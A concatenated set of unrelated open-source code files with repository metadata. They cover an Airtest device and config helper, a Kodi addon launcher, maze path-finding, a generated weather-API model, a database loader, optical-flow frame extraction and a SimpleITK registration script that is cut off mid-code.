3a7a2558b686ecc6eafbb7ffb04cd3c616b7751b | 025adca8ce56eb0113ca44ce1254bc8127d8d604 | /com/Tools/MyPoco/foundation/information.py | f30acecc528a06a20c8326fb75c8530da306a029 | [] | no_license | yuzhujiutian/RobotizationTest | c141ac60c00a3fe000ee9ddbf31317b150e8f377 | 4652e21b75ac2b3630f0377164c28a3611b11b5b | refs/heads/master | 2022-09-25T07:17:38.596744 | 2020-06-04T12:41:09 | 2020-06-04T12:41:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,246 | py | # _*_coding:utf-8 _*_
# !/usr/bin/python3
# Reference:********************************
# encoding: utf-8
# @Time: 2019/11/6 14:58
# @Author: 洞洞
# @File: information.py
# @Function:框架基础类,不要直接在脚本中调用,编写辅助脚本使用MyPocoObject类
# 用于拓展框架函数使用
# @Method:
# Reference:********************************
import configparser
import datetime
import re
import threading
from airtest.core.api import *
import shutil
class Information:
    """Framework base class wrapping config.ini access plus a few adb/device
    helpers. Per the file header: do not call directly from test scripts;
    use MyPocoObject in helper scripts. (Docstrings translated from Chinese.)
    """

    def __init__(self):
        self.cf = configparser.ConfigParser()
        # Grandparent directory of this file (the project root for this tool).
        root_dir = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
        # Absolute path of config.ini. NOTE(review): hard-coded "\\" separator
        # makes this Windows-only as written.
        self.root_dir_path = root_dir + "\\info_tab\\config.ini"
        self.cf.read(self.root_dir_path)
        # Current thread id, used as a per-thread config key (see get_phone_size).
        self.thread_file_name = str(threading.get_ident())

    def remove_section(self, section_name):
        '''
        Delete a section from the config file.
        :param section_name: section name
        :return:
        '''
        self.cf.remove_section(section_name)
        # NOTE(review): the file object passed to write() is never closed.
        self.cf.write(open(self.root_dir_path, "w"))

    def remove_option(self, section_name,option_name):
        '''
        Delete one option from a section of the config file.
        :param section_name: section name
        :return:
        '''
        self.cf.remove_option(section_name,option_name)
        self.cf.write(open(self.root_dir_path, "w"))

    def is_section_exist(self, section_name):
        '''
        Check whether a section exists in the config file.
        :param section_name: section name
        :return: True/False
        '''
        sections_list = self.cf.sections()
        if section_name in sections_list:
            return True
        else:
            return False

    def add_section(self, section_name):
        '''
        Add a section to the config file.
        :param section_name: section name
        :return:
        '''
        self.cf.add_section(section_name)
        self.cf.write(open(self.root_dir_path, "w"))

    def get_config(self, list_name, key):
        """
        Read a value from the config file.
        :param list_name: section name
        :param key: key
        :return: value
        """
        value = self.cf.get(list_name, key)
        return value

    def get_options(self, list_name):
        """
        Read all keys of a section from the config file.
        :param list_name: section name
        :return: keys_list
        """
        keys_list = self.cf.options(list_name)
        return keys_list

    def set_config(self, list_name, key, value):
        """
        Set a key-value pair in a section of the config file.
        :param list_name: section name
        :param key: key
        :param value: value
        :return:
        """
        self.cf.set(list_name, key, value)
        self.cf.write(open(self.root_dir_path, "w"))

    def get_phone_name(self):
        """
        Get the phone's model name by parsing `adb devices -l` output
        (mainly used to distinguish high/low-end devices).
        TODO (from original): load all this info once at startup instead.
        :return: model name string
        """
        lines = os.popen("adb devices -l").readlines()
        total = "model"
        for line in lines:
            if re.findall(total, line):
                # Split this line on spaces into a list
                lis = line.split(" ")
                # print(lis)
                for li in lis:
                    if re.findall(total, li):
                        li1 = li.split(":")
                        st = li1[1]
                        phone_name = st
        # NOTE(review): raises UnboundLocalError if no device/"model" field
        # is found - presumably a connected device is assumed.
        return phone_name

    def get_phone_size(self):
        """Get the phone's screen size from the config.

        NOTE(review): the original docstring promised a [width, height] list,
        but the code returns int(config value) - confirm which is intended.
        """
        phone_size_list_int = int(self.get_config("Phone_Size", self.thread_file_name))
        return phone_size_list_int

    def game_is_running(self):
        """
        Check whether the game process is still alive (crash detection)
        by asking adb for its pid.
        :return: True if a pid exists, else False
        """
        sleep(3)  # airtest sleep; give the process time to settle
        game_name = self.get_config("App_Name", "game_name")
        islist = os.popen("adb shell pidof " + game_name).readlines()
        if len(islist) == 0:
            is_run = False
        else:
            is_run = True
        return is_run

    def get_now_tiem_num(self):  # NOTE(review): "tiem" typo kept - callers use this name
        """
        Get the current unix timestamp.
        :return: int
        """
        return int(time.time())

    def get_time_str(self, str_time_input):
        """
        Convert a timestamp string to date and weekday.
        :param str_time_input: timestamp (string or number convertible to int)
        :return: [int(YYYYMMDD), int(HHMM), int(weekday 1-7)]
                 (note: hms[:-2] drops the seconds, so the middle value is HHMM)
        """
        game_time_int = int(str_time_input)
        dateArray = datetime.datetime.fromtimestamp(game_time_int)
        ymd = dateArray.strftime("%Y%m%d")
        hms = dateArray.strftime("%H%M%S")
        # strptime is a classmethod, so calling it via the instance works.
        week = dateArray.strptime(ymd, "%Y%m%d").weekday()
        return [int(ymd), int(hms[:-2]), int(week) + 1]

    def remove_file(self,file_path):
        # NOTE(review): only directories are deleted; regular files are
        # deliberately(?) left alone - confirm intent.
        if os.path.isdir(file_path):    # is it a directory?
            shutil.rmtree(file_path)    # if so, delete it recursively
        elif os.path.isfile(file_path): # is it a regular file?
            pass
| [
"342714677@qq.com"
] | 342714677@qq.com |
0c8dab75f3ff866ab6e4102f5e25974642afc211 | 22e2887c3f37af58238a966d919cba45b2908ec1 | /plugin.video.ChristianTV/FuckNeulionService.py | e8c42e02beb1e0c976466e1ba29a473b59474634 | [] | no_license | kodiwizard/repository.kodiwizard | 29a54f47c74c97f3249ac77bd5f6392b36863787 | c45db8ac5fbc185e18abfb8de7fa69a9403aca69 | refs/heads/master | 2020-03-13T17:29:33.954084 | 2019-01-22T22:39:18 | 2019-01-22T22:39:18 | 131,218,210 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | import subprocess
import sys
subprocess.call("/usr/bin/python /storage/.kodi/addons/plugin.video.white.devil/jars/FuckNeulionService.py &", shell=True)
| [
"thomasnz@hotmail.com"
] | thomasnz@hotmail.com |
790dc7efa12d0f58d79f64aa3d58cd003eeb702e | 61f4833bc5af1cf841db607d38e01294b471068e | /source/T7_Graphs/P3_Maizes/L7_WayFinder1.py | a676a28009f0100d825994d8209ec12fac911e2e | [] | no_license | krenevych/algo | 5936297834d95d3e79b4e37a6edb5d17e62572bc | 883c62f7846dde84204ea09a31fa1ce18ad2a98d | refs/heads/master | 2023-05-26T03:52:25.491238 | 2023-05-19T05:48:34 | 2023-05-19T05:48:34 | 146,658,064 | 8 | 19 | null | 2023-03-05T12:04:28 | 2018-08-29T21:01:02 | Python | UTF-8 | Python | false | false | 2,513 | py | from source.T5_LinearStructure.P1_Stack.L_1_Stack import Stack
from source.T7_Graphs.P3_Maizes.L2_ShowMaze import showMaze
from source.T7_Graphs.P3_Maizes.L4_ReadMazeFromFile import readMazeFromFile
from source.T7_Graphs.P3_Maizes.L5_Wave import wave
# 4-neighbourhood offsets (comments translated from Ukrainian).
di = [0, -1, 0, 1]  # row offsets
dj = [-1, 0, 1, 0]  # column offsets
# 8-neighbourhood variant (disabled):
# dj = [-1, -1, 0, 1, 1, 1, 0, -1]  # column offsets
# di = [0, -1, -1, -1, 0, 1, 1, 1]  # row offsets
def findWay(maze, start, end):
    """Reconstruct a shortest path in a maze from its wave (BFS) matrix.

    :param maze: maze matrix
    :param start: (row, col) of the start cell
    :param end: (row, col) of the target cell
    :return: list of cells from start to end, or [] if no path exists
    """
    waveMatrix = wave(maze, start)           # BFS distance from start
    if waveMatrix[end[0]][end[1]] == -1:     # end unreachable -> no path
        return []

    # Walk backwards from end to start, always stepping to a neighbour whose
    # wave value is exactly one less; the stack reverses the order at the end.
    stack = Stack()
    current = end
    while True:
        stack.push(current)
        if current == start:
            break
        i, j = current
        # Fix: reset `current` once per step (the original reset it inside the
        # neighbour loop, so a failed last probe left current = None and the
        # next iteration crashed on current[0]).
        current = None
        for k in range(len(dj)):
            i1 = i + di[k]
            j1 = j + dj[k]
            # Fix: bounds check - negative indices silently wrap in Python.
            if 0 <= i1 < len(waveMatrix) and 0 <= j1 < len(waveMatrix[i1]):
                if waveMatrix[i1][j1] == waveMatrix[i][j] - 1:
                    current = (i1, j1)
                    break
        if current is None:
            # Defensive: inconsistent wave matrix (should not happen when the
            # end cell was reachable above).
            return []

    # Pop the stack to get the path in start -> end order.
    way = []
    while not stack.empty():
        way.append(stack.pop())
    return way
if __name__ == "__main__":
maze = readMazeFromFile("maze.txt", 7)
way = findWay(maze, (3, 3), (7, 7))
print(way)
| [
"Krenevych"
] | Krenevych |
5bb5c4b02a0bc44e5dc8e8d0385746704ce0e2bf | d989c42f7122b783bbf330fbb194c8872c947424 | /deutschland/dwd/model/warning_nowcast.py | ed2f3f91637ac4e2040d7329d57b3e024f96839d | [
"Apache-2.0"
] | permissive | auchtetraborat/deutschland | 3c5c206cbe86ad015c7fef34c10e6c9afbc3b971 | fdc78d577c5c276629d31681ffc30e364941ace4 | refs/heads/main | 2023-08-24T08:17:51.738220 | 2021-10-20T19:35:46 | 2021-10-20T19:35:46 | 403,704,859 | 0 | 0 | Apache-2.0 | 2021-09-06T17:19:21 | 2021-09-06T17:19:20 | null | UTF-8 | Python | false | false | 11,997 | py | """
Deutscher Wetterdienst: API
Aktuelle Wetterdaten von allen Deutschen Wetterstationen # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from deutschland.dwd.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from deutschland.dwd.exceptions import ApiAttributeError
def lazy_import():
    # Deferred import: breaks the circular dependency between the generated
    # model modules.  The class is published through globals() so that code
    # in this module (e.g. openapi_types) can refer to it by name afterwards.
    from deutschland.dwd.model.warning_nowcast_warnings import WarningNowcastWarnings

    globals()["WarningNowcastWarnings"] = WarningNowcastWarnings
class WarningNowcast(ModelNormal):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.

    Attributes:
      allowed_values (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          with a capitalized key describing the allowed value and an allowed
          value. These dicts store the allowed enum values.
      attribute_map (dict): The key is attribute name
          and the value is json key in definition.
      discriminator_value_class_map (dict): A dict to go from the discriminator
          variable value to the discriminator class name.
      validations (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          that stores validations for max_length, min_length, max_items,
          min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
          inclusive_minimum, and regex.
      additional_properties_type (tuple): A tuple of classes accepted
          as additional properties values.
    """

    # This schema declares no enums and no value constraints.
    allowed_values = {}

    validations = {}

    @cached_property
    def additional_properties_type():
        """
        This must be a method because a model may have properties that are
        of type self, this must run after the class is loaded
        """
        # Resolve WarningNowcastWarnings lazily (see lazy_import above).
        lazy_import()
        return (
            bool,
            date,
            datetime,
            dict,
            float,
            int,
            list,
            str,
            none_type,
        )  # noqa: E501

    _nullable = False

    @cached_property
    def openapi_types():
        """
        This must be a method because a model may have properties that are
        of type self, this must run after the class is loaded

        Returns
            openapi_types (dict): The key is attribute name
                and the value is attribute type.
        """
        lazy_import()
        return {
            "time": (int,),  # noqa: E501
            "warnings": ([WarningNowcastWarnings],),  # noqa: E501
            # "binnen_see" may be null in the payload, hence none_type.
            "binnen_see": (
                str,
                none_type,
            ),  # noqa: E501
        }

    @cached_property
    def discriminator():
        return None

    # Python attribute name -> JSON key in the API payload.
    attribute_map = {
        "time": "time",  # noqa: E501
        "warnings": "warnings",  # noqa: E501
        "binnen_see": "binnenSee",  # noqa: E501
    }

    read_only_vars = {}

    _composed_schemas = {}

    @classmethod
    @convert_js_args_to_python_args
    def _from_openapi_data(cls, *args, **kwargs):  # noqa: E501
        """WarningNowcast - a model defined in OpenAPI

        Keyword Args:
            _check_type (bool): if True, values for parameters in openapi_types
                                will be type checked and a TypeError will be
                                raised if the wrong type is input.
                                Defaults to True
            _path_to_item (tuple/list): This is a list of keys or values to
                                drill down to the model in received_data
                                when deserializing a response
            _spec_property_naming (bool): True if the variable names in the input data
                                are serialized names, as specified in the OpenAPI document.
                                False if the variable names in the input data
                                are pythonic names, e.g. snake case (default)
            _configuration (Configuration): the instance to use when
                                deserializing a file_type parameter.
                                If passed, type conversion is attempted
                                If omitted no type conversion is done.
            _visited_composed_classes (tuple): This stores a tuple of
                                classes that we have traveled through so that
                                if we see that class again we will not use its
                                discriminator again.
                                When traveling through a discriminator, the
                                composed schema that is
                                is traveled through is added to this set.
                                For example if Animal has a discriminator
                                petType and we pass in "Dog", and the class Dog
                                allOf includes Animal, we move through Animal
                                once using the discriminator, and pick Dog.
                                Then in Dog, we will make an instance of the
                                Animal class but this time we won't travel
                                through its discriminator because we passed in
                                _visited_composed_classes = (Animal,)
            time (int): [optional]  # noqa: E501
            warnings ([WarningNowcastWarnings]): [optional]  # noqa: E501
            binnen_see (str, none_type): [optional]  # noqa: E501
        """

        # Pop the framework-control keywords before treating the rest as
        # model properties.
        _check_type = kwargs.pop("_check_type", True)
        _spec_property_naming = kwargs.pop("_spec_property_naming", False)
        _path_to_item = kwargs.pop("_path_to_item", ())
        _configuration = kwargs.pop("_configuration", None)
        _visited_composed_classes = kwargs.pop("_visited_composed_classes", ())

        self = super(OpenApiModel, cls).__new__(cls)

        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
                % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )

        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)

        for var_name, var_value in kwargs.items():
            if (
                var_name not in self.attribute_map
                and self._configuration is not None
                and self._configuration.discard_unknown_keys
                and self.additional_properties_type is None
            ):
                # discard variable.
                continue
            setattr(self, var_name, var_value)
        return self

    # Internal attributes that must always exist on an instance.
    required_properties = set(
        [
            "_data_store",
            "_check_type",
            "_spec_property_naming",
            "_path_to_item",
            "_configuration",
            "_visited_composed_classes",
        ]
    )

    @convert_js_args_to_python_args
    def __init__(self, *args, **kwargs):  # noqa: E501
        """WarningNowcast - a model defined in OpenAPI

        Keyword Args:
            _check_type (bool): if True, values for parameters in openapi_types
                                will be type checked and a TypeError will be
                                raised if the wrong type is input.
                                Defaults to True
            _path_to_item (tuple/list): This is a list of keys or values to
                                drill down to the model in received_data
                                when deserializing a response
            _spec_property_naming (bool): True if the variable names in the input data
                                are serialized names, as specified in the OpenAPI document.
                                False if the variable names in the input data
                                are pythonic names, e.g. snake case (default)
            _configuration (Configuration): the instance to use when
                                deserializing a file_type parameter.
                                If passed, type conversion is attempted
                                If omitted no type conversion is done.
            _visited_composed_classes (tuple): This stores a tuple of
                                classes that we have traveled through so that
                                if we see that class again we will not use its
                                discriminator again.
                                When traveling through a discriminator, the
                                composed schema that is
                                is traveled through is added to this set.
                                For example if Animal has a discriminator
                                petType and we pass in "Dog", and the class Dog
                                allOf includes Animal, we move through Animal
                                once using the discriminator, and pick Dog.
                                Then in Dog, we will make an instance of the
                                Animal class but this time we won't travel
                                through its discriminator because we passed in
                                _visited_composed_classes = (Animal,)
            time (int): [optional]  # noqa: E501
            warnings ([WarningNowcastWarnings]): [optional]  # noqa: E501
            binnen_see (str, none_type): [optional]  # noqa: E501
        """

        _check_type = kwargs.pop("_check_type", True)
        _spec_property_naming = kwargs.pop("_spec_property_naming", False)
        _path_to_item = kwargs.pop("_path_to_item", ())
        _configuration = kwargs.pop("_configuration", None)
        _visited_composed_classes = kwargs.pop("_visited_composed_classes", ())

        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
                % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )

        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)

        for var_name, var_value in kwargs.items():
            if (
                var_name not in self.attribute_map
                and self._configuration is not None
                and self._configuration.discard_unknown_keys
                and self.additional_properties_type is None
            ):
                # discard variable.
                continue
            setattr(self, var_name, var_value)
            # Unlike _from_openapi_data, user construction may not touch
            # read-only attributes.
            if var_name in self.read_only_vars:
                raise ApiAttributeError(
                    f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
                    f"class with read only attributes."
                )
| [
"wirthra@gmail.com"
] | wirthra@gmail.com |
a75f3d6ce4ca8f601dfb55f9cad6a8c16d8b3f44 | 014ba73c9c3decfa8aa9285843631e5c98570cbd | /Database/load_db_tool.py | ddc0e8f2c5103aa1b7325940196c7bf09475cd5a | [] | no_license | CSPB-3308/Travel-Recommender | e8c14161029f418f1e35473ef3c63695e0b84166 | c243990e6b530b05b975c04c07a8ba03acb6835b | refs/heads/master | 2023-01-28T22:00:40.867905 | 2020-12-12T01:53:57 | 2020-12-12T01:53:57 | 296,483,890 | 0 | 0 | null | 2020-11-23T02:59:07 | 2020-09-18T01:39:37 | Python | UTF-8 | Python | false | false | 1,293 | py | #!/usr/bin/env python3
import os
import sys
import query_db
if __name__ == '__main__':
    # Expect exactly two arguments: a record-type flag and the input file.
    if len(sys.argv) != 3:
        print("Usage: load_db_tool.py [-D, -d, -a, -l] [filename]")
        print("-D: Destination File\n -d: Dining File\n -a: Attractions File\n -l: Lodging File")
    else:
        fileType = sys.argv[1]
        fileName = sys.argv[2]
        queryHandler = query_db.QueryHandler()
        # 'with' guarantees the file is closed even if a query raises.
        # NOTE: the original used "else if" (a syntax error in Python) and
        # was missing a colon on the "-l" branch; fixed to elif below.
        with open(fileName, 'r') as infile:
            for line in infile:
                dataFields = line.split()  # whitespace-separated columns
                if fileType == "-a":
                    queryHandler.addAttraction(dataFields[0], dataFields[1], dataFields[2], dataFields[3], dataFields[4])
                elif fileType == "-d":
                    queryHandler.addDining(dataFields[0], dataFields[1], dataFields[2], dataFields[3], dataFields[4], dataFields[5])
                elif fileType == "-D":
                    queryHandler.addDestination(dataFields[0], dataFields[1], dataFields[2])
                elif fileType == "-l":
                    queryHandler.addLodging(dataFields[0], dataFields[1], dataFields[2], dataFields[3], dataFields[4])
queryHandler.close_conn() | [
"brhi6213@colorado.edu"
] | brhi6213@colorado.edu |
a01bdca1898fdadec08676b45c4bfbf7d587cc88 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_397/ch6_2020_03_04_19_39_52_514053.py | d80fe50cbca06aa26b98b832df81cd9961a2fad3 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 61 | py | def celsius_para_fahrenheit (C):
F= C*9/5+32
return F | [
"you@example.com"
] | you@example.com |
58021783ebe0d148a20a82e782c7f7581be8d74d | 7fc09f7de6c571c52348c1a40ed8b90c53cade22 | /optical.py | f3d6dd04aa31edbfe002d9502ff59d2b2cf9f819 | [] | no_license | rachidasen/Content-Based-Video-Classification | baf8bf22044cd522bbc124e1ee29d95eb13dfaef | 256311209655ea22a67f544fff8802e62c90a670 | refs/heads/master | 2021-09-29T03:19:04.026202 | 2018-11-23T08:14:33 | 2018-11-23T08:14:33 | 54,796,532 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,305 | py | import cv2
import sys
import os
import glob
import numpy as np
# list of all classes
def gen_frame(path):
classes=('basketball','diving','horse_riding','soccer_juggling','swing','trampoline_jumping','walking','biking',
'golf_swing','tennis_swing','volleyball_spiking');
# get the parent directory where this program is stored
dir=path
#print dir
# concatenate the path to videos' folder
save=os.path.join(dir,"frames")
dir=os.path.join(dir,"frames")
count=0
#print dir
#print save
if not os.path.exists(save):
os.mkdir(save)
for category in classes:
#print category
# category='basketball'
rootdir=os.path.join(dir,category)
#print rootdir
# print subFolders,files
print "Name of video file"
#count+=1
#count2=0
for dirpath,dirname,files in os.walk(rootdir):
# print "dirname",type(dirpath)
#print files
"""x=dirpath.rfind("/")
print x
print dirpath[x+1:],dirpath
print "files",files"""
#print dirpath
# if not os.path.exists(os.path.join(save,dirpath[x+1:],dirpath)):
# os.mkdir(os.path.join(save,dirpath[x+1:],dirpath))
files=glob.glob(dirpath+"/*.mpg")
#print files
#print "\n"
#print count2
#count2+=1
#print "/n"
if files:
print files
#print count
#count+=1
for video_dir in files:
# capturing the location of video
print "dirpath",dirpath,"video",video_dir
print count
count+=1
# video_dir=os.path.join(dirpath,vid)
# print video_dir
x=video_dir.rfind(".")
new=video_dir[:x]
if not os.path.isdir(new):
os.mkdir(new)
# os.system("mkdir new/optical_flow_images")
count=0
video = cv2.VideoCapture(video_dir)
if video.grab():
# Now write your code
# input availabe
# video =name of video
# directory= new
try:
ret, frame1 = video.read()
frame1=cv2.resize(frame1,(150,150))
prvs = cv2.cvtColor(frame1,cv2.COLOR_BGR2GRAY)
while(1):
ret, frame2 = video.read()
if frame2==None:
break
count+=1
if count==300:
break
#print ()
frame2=cv2.resize(frame2,(150,150))
next=cv2.cvtColor(frame2,cv2.COLOR_BGR2GRAY)
flow=cv2.calcOpticalFlowFarneback(prvs,next, None, 0.5, 3, 15, 3, 5, 1.2, 0)
horz = cv2.normalize(flow[...,0], None, 0, 255, cv2.NORM_MINMAX)
vert = cv2.normalize(flow[...,1], None, 0, 255, cv2.NORM_MINMAX)
horz = horz.astype('uint8')
vert = vert.astype('uint8')
pic=new+'/h'+str(count)
pic1=new+'/v'+str(count)
cv2.imwrite(pic+'.jpg',horz)
cv2.imwrite(pic1+'.jpg',vert)
prvs = next
video.release()
except Exception, e:
print e
# generate optical frames and write to the directory new
#cv2.destroyAllWindows()
# print "generating frames"
# i=0
# #ret=True
# ret,frame1=video.read()
# print ret
# if frame1==None:
# break
# while(ret):
# try:
# #ret,frame1=video.read()
# #print ret
# #print frame1
# if ret:
# frame1=cv2.resize(frame1,(150,150))
# prvs = cv2.cvtColor(frame1,cv2.COLOR_BGR2GRAY)
# #hsv = np.zeros_like(frame1)
# #hsv[...,1] = 255
# ret, frame2 = video.read()
# next = cv2.cvtColor(frame2,cv2.COLOR_BGR2GRAY)
# flow = cv2.calcOpticalFlowFarneback(prvs,next, None, 0.5, 3, 15, 3, 5, 1.2, 0)
# mag, ang = cv2.cartToPolar(flow[...,0], flow[...,1])
# hsv[...,0] = ang*180/np.pi/2
# hsv[...,2] = cv2.normalize(mag,None,0,255,cv2.NORM_MINMAX)
# bgr = cv2.cvtColor(hsv,cv2.COLOR_HSV2BGR)
# #cv2.imshow('frame2',bgr)
# #k = cv2.waitKey(300) & 0xff
# print "here k"
# if k == 27:
# print "here 2",k
# break
# #elif k == ord('s'):
# pic=new+"/"+'opticalfb'+str(i)+".jpg"
# pic1=new+"/"+'opticalhsv'+str(i)+".jpg"
# print pic
# print pic1
# cv2.imwrite(pic,frame2)
# cv2.imwrite(pic1,bgr)
# i+=1
# prvs = next
# #pic=new+"/"+str(i)+".bmp"
# # print pic
# #cv2.imwrite(pic,frame)
# print "outside loop"
# #i+=1"""
# except (IOError,RuntimeError, TypeError, NameError):
# print "skipping"
# os.remove(video_dir)
# print i
# making frames of a video
# if video.grab()"""
if __name__=="__main__":
    # Edit this path to point at the dataset root (must contain "frames/").
    gen_frame("/home/karpathy")
| [
"rachidasen@users.noreply.github.com"
] | rachidasen@users.noreply.github.com |
f1e7f09a5a72760fa6841d7afb3fe30b0752ed3f | 1fab020c04b1dcd0d2d528d68f9eeec33797d8bb | /library/system/migrations/0011_studentissued.py | acb96463fc9d949f4ee8477b3ca602b8435fe6f8 | [] | no_license | riya-mistry/LibraryManagementSystem | 88ff19ecc4126f07b8d1b3b73b85763775d3c1db | 87d73c0dea80e0046e2ce3fe113f84885bb59691 | refs/heads/master | 2022-04-21T11:56:33.982036 | 2020-04-22T15:16:22 | 2020-04-22T15:16:22 | 257,936,509 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 847 | py | # Generated by Django 3.0.1 on 2020-01-29 11:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated migration: recreates the StudentIssued table (dropped
    # in 0010) that records a book loan: which Student holds which Books
    # record and when it must be returned.
    dependencies = [
        ('student', '0001_initial'),
        ('system', '0010_delete_studentissued'),
    ]
    operations = [
        migrations.CreateModel(
            name='StudentIssued',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                # auto_now=True: the issue date is refreshed on every save.
                ('date', models.DateField(auto_now=True)),
                ('return_date', models.DateField()),
                # Deleting the book or the student cascades to the loan row.
                ('book_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='system.Books')),
                ('student_id', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='student.Student')),
            ],
        ),
    ]
| [
"riyamistry2904@gmail.com"
] | riyamistry2904@gmail.com |
dfae22d85da588a85268d051bfcf5c3d95ee9746 | 59b464d7c6b44f3bae33ded569b2ce0e9c8f897d | /Learning_projects/SimpleITK_pruebas/pruebas/ImageRegistrationMethodDisplacement1.py | 13854acc22a7409d40499ee12593a02dd3bdc622 | [] | no_license | Rmartin20/Regim-project | 6ef48495f95d5b8907a925a2e9af20efad99bdb1 | 7ebe18dfabf733172a75fa28862640639664432d | refs/heads/master | 2020-03-29T20:50:06.913419 | 2018-09-27T16:52:34 | 2018-09-27T16:52:34 | 150,333,511 | 0 | 0 | null | 2018-09-25T21:51:42 | 2018-09-25T21:51:41 | null | UTF-8 | Python | false | false | 3,967 | py | from __future__ import print_function
import SimpleITK as sitk
from PIL import Image
import sys
import os
def command_iteration(method):
    """Print per-iteration diagnostics for a running registration method."""
    iteration = method.GetOptimizerIteration()
    if iteration == 0:
        # First iteration of a level: report the level and scales once.
        print("\tLevel: {0}".format(method.GetCurrentLevel()))
        print("\tScales: {0}".format(method.GetOptimizerScales()))
    print("#{0}".format(iteration))
    print("\tMetric Value: {0:10.5f}".format(method.GetMetricValue()))
    print("\tLearningRate: {0:10.5f}".format(method.GetOptimizerLearningRate()))
    convergence = method.GetOptimizerConvergenceValue()
    # float_info.max is the sentinel meaning "no convergence value yet".
    if convergence != sys.float_info.max:
        print("\tConvergence Value: {0:.5e}".format(convergence))
def command_multiresolution_iteration(method):
    """Announce the end of one resolution level of the registration."""
    stop_condition = method.GetOptimizerStopConditionDescription()
    print("\tStop Condition: {0}".format(stop_condition))
    print("============= Resolution Change =============")
fixed_file = '../images/fixedImage.png'
moving_file = '../images/movingImage.png'
# Both images are read as 32-bit float, as the metrics require.
fixed = sitk.ReadImage(fixed_file, sitk.sitkFloat32)
moving = sitk.ReadImage(moving_file, sitk.sitkFloat32)
# ---- Stage 1: global affine pre-alignment -------------------------------
initialTx = sitk.CenteredTransformInitializer(fixed, moving, sitk.AffineTransform(fixed.GetDimension()))
R = sitk.ImageRegistrationMethod()
# Three-level multi-resolution pyramid (coarse -> fine).
R.SetShrinkFactorsPerLevel([3, 2, 1])
R.SetSmoothingSigmasPerLevel([2, 1, 1])
R.SetMetricAsJointHistogramMutualInformation(20)
R.MetricUseFixedImageGradientFilterOff()
R.SetOptimizerAsGradientDescent(learningRate=1.0,
                                numberOfIterations=100,
                                estimateLearningRate=R.EachIteration)
R.SetOptimizerScalesFromPhysicalShift()
R.SetInitialTransform(initialTx, inPlace=True)
R.SetInterpolator(sitk.sitkLinear)
# Progress callbacks defined above (per iteration / per level change).
R.AddCommand(sitk.sitkIterationEvent, lambda: command_iteration(R))
R.AddCommand(sitk.sitkMultiResolutionIterationEvent, lambda: command_multiresolution_iteration(R))
outTx = R.Execute(fixed, moving)
print("-------")
print(outTx)
print("Optimizer stop condition: {0}".format(R.GetOptimizerStopConditionDescription()))
print(" Iteration: {0}".format(R.GetOptimizerIteration()))
print(" Metric value: {0}".format(R.GetMetricValue()))
# ---- Stage 2: deformable refinement via a displacement field ------------
displacementField = sitk.Image(fixed.GetSize(), sitk.sitkVectorFloat64)
displacementField.CopyInformation(fixed)
displacementTx = sitk.DisplacementFieldTransform(displacementField)
del displacementField  # the transform now owns the field buffer
displacementTx.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0.0,
                                            varianceForTotalField=1.5)
# The affine result becomes the fixed initial transform for this stage.
R.SetMovingInitialTransform(outTx)
R.SetInitialTransform(displacementTx, inPlace=True)
R.SetMetricAsANTSNeighborhoodCorrelation(4)
R.MetricUseFixedImageGradientFilterOff()
R.SetShrinkFactorsPerLevel([3, 2, 1])
R.SetSmoothingSigmasPerLevel([2, 1, 1])
R.SetOptimizerScalesFromPhysicalShift()
R.SetOptimizerAsGradientDescent(learningRate=1,
                                numberOfIterations=300,
                                estimateLearningRate=R.EachIteration)
# Compose affine + displacement into a single overall transform.
outTx.AddTransform(R.Execute(fixed, moving))
print("-------")
print(outTx)
print("Optimizer stop condition: {0}".format(R.GetOptimizerStopConditionDescription()))
print(" Iteration: {0}".format(R.GetOptimizerIteration()))
print(" Metric value: {0}".format(R.GetMetricValue()))
# sitk.WriteTransform(outTx, sys.argv[3])
if not "SITK_NOSHOW" in os.environ:
    # sitk.Show(displacementTx.GetDisplacementField(), "Displacement Field")
    # Resample the moving image through the final transform and show a
    # red/green overlay of fixed vs. registered-moving for visual QA.
    resampler = sitk.ResampleImageFilter()
    resampler.SetReferenceImage(fixed)
    resampler.SetInterpolator(sitk.sitkLinear)
